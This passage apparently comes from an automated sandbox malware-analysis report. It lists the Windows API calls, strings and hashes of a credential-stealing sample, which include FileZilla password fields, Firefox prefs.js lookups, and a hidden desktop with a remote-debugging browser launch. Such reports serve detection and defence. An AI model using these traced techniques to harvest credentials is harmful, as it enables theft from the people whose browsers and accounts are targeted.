                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456DDF
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00456DF2
                        • lstrlen.KERNEL32(00000000), ref: 00456E01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456E49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456E71
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00456E94
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00456EA8
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00456EC9
                        • LocalFree.KERNEL32(00000000), ref: 00456ED4
                        • lstrlen.KERNEL32(?), ref: 00456F6E
                        • lstrlen.KERNEL32(?), ref: 00456F81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 2641759534-2314656281
                        • Opcode ID: 992d9b1f4740ea89dca6902495dcebe7690ea8d64d508b40d949796ea8b76ead
                        • Instruction ID: 026329978e94531ed0b024502b9058c64d17ced9b7a0edd89c1b161a37c49ded
                        • Opcode Fuzzy Hash: 992d9b1f4740ea89dca6902495dcebe7690ea8d64d508b40d949796ea8b76ead
                        • Instruction Fuzzy Hash: 9B02E130A10201AFDB25ABB0DD49AAFBBBAAF04705F54541AFC05E7352DB7CDC458B68
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00454B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454B7F
                        • lstrlen.KERNEL32(00474CA8), ref: 00454B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454BA7
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 00454BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00454BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: prefs.js
                        • API String ID: 2567437900-3783873740
                        • Opcode ID: 467556326e7792c12d8b8736f8fe27b73520130dbf609a26a84fc83ab382b3fe
                        • Instruction ID: d000a3a1f55e483d6b163fa4381ae421058d3fb29f760da5ac935789aad31ed8
                        • Opcode Fuzzy Hash: 467556326e7792c12d8b8736f8fe27b73520130dbf609a26a84fc83ab382b3fe
                        • Instruction Fuzzy Hash: 27929230A016018FDB28CF29C958B6AB7F5AF44315F5980AEEC09DB3A2D779DC85CB54
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00451291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004512B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004512BF
                        • lstrlen.KERNEL32(00474CA8), ref: 004512CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004512E7
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 004512F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0045133A
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045135C
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00451376
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004513AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004513D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004513E2
                        • lstrlen.KERNEL32(00471794), ref: 004513ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045140A
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451416
                        • lstrlen.KERNEL32(?), ref: 00451423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451443
                        • lstrcat.KERNEL32(00000000,?), ref: 00451451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045147A
                        • StrCmpCA.SHLWAPI(?,0158D418), ref: 004514A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 004514E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451535
                        • StrCmpCA.SHLWAPI(?,0158D810), ref: 00451552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451593
                        • lstrcpy.KERNEL32(00000000,?), ref: 004515BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004515E4
                        • StrCmpCA.SHLWAPI(?,0158D388), ref: 00451602
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451633
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045165C
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451685
                        • StrCmpCA.SHLWAPI(?,0158D2F8), ref: 004516B3
                        • lstrcpy.KERNEL32(00000000,?), ref: 004516F4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045171D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451745
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004517BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 004517F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045181C
                        • FindClose.KERNEL32(00000000), ref: 0045182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: e614aad7bbf0d4a59fb752f61254166b856b8472a709aaa58d8a61deef83cb24
                        • Instruction ID: 9e3ca43a23a5202377f91178baf137eccc1d10db28c0a73dd4c87e919bb7d082
                        • Opcode Fuzzy Hash: e614aad7bbf0d4a59fb752f61254166b856b8472a709aaa58d8a61deef83cb24
                        • Instruction Fuzzy Hash: D812A170A102069BDB24EF79DD89AAF77B9AF04305F44452EFC4A93361DB38DC458BA4
                        APIs
                        • wsprintfA.USER32 ref: 0045CBFC
                        • FindFirstFileA.KERNEL32(?,?), ref: 0045CC13
                        • lstrcat.KERNEL32(?,?), ref: 0045CC5F
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045CC71
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0045CC8B
                        • wsprintfA.USER32 ref: 0045CCB0
                        • PathMatchSpecA.SHLWAPI(?,01589198), ref: 0045CCE2
                        • CoInitialize.OLE32(00000000), ref: 0045CCEE
                          • Part of subcall function 0045CAE0: CoCreateInstance.COMBASE(0046B110,00000000,00000001,0046B100,?), ref: 0045CB06
                          • Part of subcall function 0045CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0045CB46
                          • Part of subcall function 0045CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0045CBC9
                        • CoUninitialize.COMBASE ref: 0045CD09
                        • lstrcat.KERNEL32(?,?), ref: 0045CD2E
                        • lstrlen.KERNEL32(?), ref: 0045CD3B
                        • StrCmpCA.SHLWAPI(?,0046CFEC), ref: 0045CD55
                        • wsprintfA.USER32 ref: 0045CD7D
                        • wsprintfA.USER32 ref: 0045CD9C
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0045CDB0
                        • wsprintfA.USER32 ref: 0045CDD8
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0045CDF1
                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0045CE10
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 0045CE28
                        • CloseHandle.KERNEL32(00000000), ref: 0045CE33
                        • CloseHandle.KERNEL32(00000000), ref: 0045CE3F
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045CE54
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045CE94
                        • FindNextFileA.KERNEL32(?,?), ref: 0045CF8D
                        • FindClose.KERNEL32(?), ref: 0045CF9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                        • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 3860919712-2388001722
                        • Opcode ID: a155c3f05a3ed1241360b494615d55d55462caaaa085aa6ead92f33f6f1c86b1
                        • Instruction ID: f136581e187de09c38b667175d5c5fb0cb93c8064acd202ddd73cb2078091f8b
                        • Opcode Fuzzy Hash: a155c3f05a3ed1241360b494615d55d55462caaaa085aa6ead92f33f6f1c86b1
                        • Instruction Fuzzy Hash: 72C18571A003089FDB24DF64DC89AEF777AAF44305F004559F909A7291EB78AE84CF64
                        APIs
                        • memset.MSVCRT ref: 00449790
                        • lstrcat.KERNEL32(?,?), ref: 004497A0
                        • lstrcat.KERNEL32(?,?), ref: 004497B1
                        • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004497C3
                        • memset.MSVCRT ref: 004497D7
                          • Part of subcall function 00463E70: lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00463EA5
                          • Part of subcall function 00463E70: lstrcpy.KERNEL32(00000000,0158A350), ref: 00463ECF
                          • Part of subcall function 00463E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0044134E,?,0000001A), ref: 00463ED9
                        • wsprintfA.USER32 ref: 00449806
                        • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00449827
                        • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00449844
                          • Part of subcall function 004646A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004646B9
                          • Part of subcall function 004646A0: Process32First.KERNEL32(00000000,00000128), ref: 004646C9
                          • Part of subcall function 004646A0: Process32Next.KERNEL32(00000000,00000128), ref: 004646DB
                          • Part of subcall function 004646A0: StrCmpCA.SHLWAPI(?,?), ref: 004646ED
                          • Part of subcall function 004646A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00464702
                          • Part of subcall function 004646A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00464711
                          • Part of subcall function 004646A0: CloseHandle.KERNEL32(00000000), ref: 00464718
                          • Part of subcall function 004646A0: Process32Next.KERNEL32(00000000,00000128), ref: 00464726
                          • Part of subcall function 004646A0: CloseHandle.KERNEL32(00000000), ref: 00464731
                        • memset.MSVCRT ref: 00449862
                        • lstrcat.KERNEL32(00000000,?), ref: 00449878
                        • lstrcat.KERNEL32(00000000,?), ref: 00449889
                        • lstrcat.KERNEL32(00000000,00474B60), ref: 0044989B
                        • memset.MSVCRT ref: 004498AF
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004498D4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00449903
                        • StrStrA.SHLWAPI(00000000,0158E010), ref: 00449919
                        • lstrcpyn.KERNEL32(006793D0,00000000,00000000), ref: 00449938
                        • lstrlen.KERNEL32(?), ref: 0044994B
                        • wsprintfA.USER32 ref: 0044995B
                        • lstrcpy.KERNEL32(?,00000000), ref: 00449971
                        • memset.MSVCRT ref: 00449986
                        • Sleep.KERNEL32(00001388), ref: 004499E7
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                          • Part of subcall function 004492B0: strlen.MSVCRT ref: 004492E1
                          • Part of subcall function 004492B0: strlen.MSVCRT ref: 004492FA
                          • Part of subcall function 004492B0: strlen.MSVCRT ref: 00449399
                          • Part of subcall function 004492B0: strlen.MSVCRT ref: 004493E6
                          • Part of subcall function 00464740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00464759
                          • Part of subcall function 00464740: Process32First.KERNEL32(00000000,00000128), ref: 00464769
                          • Part of subcall function 00464740: Process32Next.KERNEL32(00000000,00000128), ref: 0046477B
                          • Part of subcall function 00464740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046479C
                          • Part of subcall function 00464740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004647AB
                          • Part of subcall function 00464740: CloseHandle.KERNEL32(00000000), ref: 004647B2
                          • Part of subcall function 00464740: Process32Next.KERNEL32(00000000,00000128), ref: 004647C0
                          • Part of subcall function 00464740: CloseHandle.KERNEL32(00000000), ref: 004647CB
                        • CloseDesktop.USER32(?), ref: 00449A1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                        • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                        • API String ID: 2040986984-1862457068
                        • Opcode ID: d50a263ce94cdc4d1c38c4bd2bd6e24ba91334cee86872c573b6aede8ffc14af
                        • Instruction ID: 33bb53f16b32265a42a80f907484395edcb10f9a60b0ba45deba1f6cd845eb3b
                        • Opcode Fuzzy Hash: d50a263ce94cdc4d1c38c4bd2bd6e24ba91334cee86872c573b6aede8ffc14af
                        • Instruction Fuzzy Hash: 5E918471A50208AFEB14DF74DC49FDE77B9AF44700F508099FA0DA7281DB74AE848BA4
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00451291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004512B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004512BF
                        • lstrlen.KERNEL32(00474CA8), ref: 004512CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004512E7
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 004512F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0045133A
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045135C
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00451376
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004513AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004513D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004513E2
                        • lstrlen.KERNEL32(00471794), ref: 004513ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045140A
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451416
                        • lstrlen.KERNEL32(?), ref: 00451423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451443
                        • lstrcat.KERNEL32(00000000,?), ref: 00451451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045147A
                        • StrCmpCA.SHLWAPI(?,0158D418), ref: 004514A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 004514E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451535
                        • StrCmpCA.SHLWAPI(?,0158D810), ref: 00451552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451593
                        • lstrcpy.KERNEL32(00000000,?), ref: 004515BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004515E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004517BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 004517F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045181C
                        • FindClose.KERNEL32(00000000), ref: 0045182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: 6f59a28d8806c4e56a392bde136ca54c4a2050f56d2a9cca469bc90457643814
                        • Instruction ID: fc699f0c0b8fcf24609fd9016985ea13122e7d107c8996b55a724bf2f8f1ea5a
                        • Opcode Fuzzy Hash: 6f59a28d8806c4e56a392bde136ca54c4a2050f56d2a9cca469bc90457643814
                        • Instruction Fuzzy Hash: 1FC1C470A102069BDB25EF75DD89BAF77B5AF04305F40112AFC4AA3362DB78DC458BA4
                        APIs
                        • wsprintfA.USER32 ref: 0045E22C
                        • FindFirstFileA.KERNEL32(?,?), ref: 0045E243
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045E263
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0045E27D
                        • wsprintfA.USER32 ref: 0045E2A2
                        • StrCmpCA.SHLWAPI(?,0046CFEC), ref: 0045E2B4
                        • wsprintfA.USER32 ref: 0045E2D1
                          • Part of subcall function 0045EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0045EE12
                        • wsprintfA.USER32 ref: 0045E2F0
                        • PathMatchSpecA.SHLWAPI(?,?), ref: 0045E304
                        • lstrcat.KERNEL32(?,0158EAF8), ref: 0045E335
                        • lstrcat.KERNEL32(?,00471794), ref: 0045E347
                        • lstrcat.KERNEL32(?,?), ref: 0045E358
                        • lstrcat.KERNEL32(?,00471794), ref: 0045E36A
                        • lstrcat.KERNEL32(?,?), ref: 0045E37E
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0045E394
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E3D2
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E422
                        • DeleteFileA.KERNEL32(?), ref: 0045E45C
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045E49B
                        • FindClose.KERNEL32(00000000), ref: 0045E4AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
